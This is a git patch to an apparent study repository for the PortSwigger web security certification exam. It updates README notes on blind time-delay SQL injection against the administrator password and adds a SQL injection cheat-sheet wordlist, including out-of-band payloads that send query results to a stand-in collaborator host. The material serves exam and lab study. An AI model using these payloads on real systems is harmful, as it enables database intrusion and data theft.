From 13dcfa0fece4b8998cb8926493898f754eadd704 Mon Sep 17 00:00:00 2001
From: Juan Botes <52822072+botesjuan@users.noreply.github.com>
Date: Tue, 21 Mar 2023 10:19:49 +0200
Subject: [PATCH] BSCP

BSCP
---
 README.md                                   | 12 +++--
 wordlists/burp-sqli-cheatsheet-wordlist.txt | 57 +++++++++++++++++++++
 2 files changed, 65 insertions(+), 4 deletions(-)
 create mode 100644 wordlists/burp-sqli-cheatsheet-wordlist.txt

diff --git a/README.md b/README.md
index 3943c68..c77a042 100644
--- a/README.md
+++ b/README.md
@@ -656,7 +656,7 @@ location = "https://TARGET.net/?SearchTerm=%22%2d%65%76%61%6c%28%61%74%6f%62%28%
 
 ![(Deliver reflected xss to steal victim cookie.](images/xss1.png)  
 
->**NOTE:** `Deliver exploit to victim` few times if the active user do not send HTTP request to collaborator. Replace the current cookie value with the stolen cookie to impersonate the active user and move on to [Stage 2 of the Practice Exam](#sqlmap).  
+>**NOTE:** `Deliver exploit to victim` few times if the active user do not send HTTP request to collaborator. Replace the current cookie value with the stolen cookie to impersonate the active user and move on to [Stage 2 of the Practice Exam](#blind-time-delay).  
 
 [PortSwigger Practice Exam - Stage 1 - Foothold](https://portswigger.net/web-security/certification/takepracticeexam/index.html)  
   
@@ -1567,17 +1567,21 @@ csrf=TOKEN&username=administrator
 
 >Blind SQL injection with time delays is tricky to ***identify***, fuzzing involves educated guessing as OffSec also taught me in OSCP. The below payload will perform conditional case to delay the response by 10 seconds if positive SQL injection ***identified***. 
 
->Identify SQLi vulnerability.  
+>Identify SQLi vulnerability. In [Burp Practice exam Stage 2](https://portswigger.net/web-security/certification/takepracticeexam/index.html) the advance search filters are vulnerable to `PostgreSQL`, but `SQLMAP` no longer since March 2023 able to identify and exploit the vulnerability.   
 
 ```SQL
 ;SELECT CASE WHEN (1=1) THEN pg_sleep(7) ELSE pg_sleep(0) END--
+```
+
+>[URL encoded](https://www.urlencoder.org/) `PostgreSQL` payload.  
 
+```SQL
 '%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END--
 ```  
 
->Determine how many characters are in the password of the administrator user. To do this, change the value to:  
+>Determine how many characters are in the password of the administrator user. To do this, increment the number after ` >1 ` conditional check.  
 
-```sql
+```SQL
 ;SELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
 ```
 
diff --git a/wordlists/burp-sqli-cheatsheet-wordlist.txt b/wordlists/burp-sqli-cheatsheet-wordlist.txt
new file mode 100644
index 0000000..0954073
--- /dev/null
+++ b/wordlists/burp-sqli-cheatsheet-wordlist.txt
@@ -0,0 +1,57 @@
+PortSwigger SQL injection Cheat Sheet
+'foo'||'bar'
+'foo'+'bar'
+'foo'||'bar'
+'foo' 'bar'
+CONCAT('foo','bar')
+SUBSTR('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+SUBSTRING('foobar', 4, 2)
+--comment
+--comment
+/*comment*/
+--comment
+/*comment*/
+#comment
+-- comment 
+/*comment*/
+SELECT banner FROM v$version
+SELECT version FROM v$instance
+SELECT @@version
+SELECT version()
+SELECT @@version
+SELECT * FROM all_tables
+SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.tables
+SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
+1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)
+SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')
+QUERY-1-HERE; QUERY-2-HERE
+QUERY-1-HERE; QUERY-2-HERE
+QUERY-1-HERE; QUERY-2-HERE
+dbms_pipe.receive_message(('a'),10)
+WAITFOR DELAY '0:0:10'
+SELECT pg_sleep(10)
+SELECT SLEEP(10)
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
+IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
+SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
+SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')
+SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://COLLABORATOR.NET/"> %remote;]>'),'/l') FROM dual
+SELECT UTL_INADDR.get_host_address('COLLABORATOR.NET')
+exec master..xp_dirtree '//COLLABORATOR.NET/a'
+copy (SELECT '') to program 'nslookup COLLABORATOR.NET'
+LOAD_FILE('\\\\COLLABORATOR.NET\\a')
+SELECT ... INTO OUTFILE '\\\\COLLABORATOR.NET\a'
+SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.COLLABORATOR.NET/"> %remote;]>'),'/l') FROM dual
+declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.COLLABORATOR.NET/a"')
+SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\COLLABORATOR.NET\a'
+